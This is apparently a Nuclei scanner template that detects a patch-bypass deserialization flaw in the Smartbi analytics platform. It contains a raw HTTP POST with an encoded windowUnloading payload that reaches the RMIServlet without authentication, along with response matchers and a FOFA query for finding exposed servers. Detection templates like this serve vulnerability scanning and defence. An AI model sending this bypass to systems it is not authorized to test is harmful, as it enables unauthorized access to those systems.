id: smartbi-deserialization info: name: Smartbi windowunloading Interface - Deserialization author: SleepingBag945 severity: high description: | The Smartbi big data analysis platform has a remote command execution vulnerability. An unauthenticated remote attacker can use the stub interface to construct a request to bypass patch restrictions and then control the JDBC URL, which can ultimately lead to remote code execution or information leakage. reference: - https://stack.chaitin.com/techblog/detail?id=122 - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/smartbi-windowunloading-other.yaml - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Smartbi%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md metadata: verified: true max-request: 2 fofa-query: app="SMARTBI" tags: smartbi,deserialization http: - raw: - | POST {{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded className=UserService&methodName=isLogged¶ms=[] payloads: path: - /smartbi/vision/RMIServlet?windowUnloading=&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 - /vision/RMIServlet?windowUnloading=&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '"H~CxOm~"' - type: word part: header words: - 'text/plain' - type: status status: - 200 # digest: 490a00463044022018ca46ba35a339710e7901c9efb0397151acdd39765b52b7408fce24dc119ecd02200ed7c702483b2d5a9b7e2fecd83e4914a71eef75cdbffc2e579d542819e2a408:922c64590222798bb761d5b6d8e72950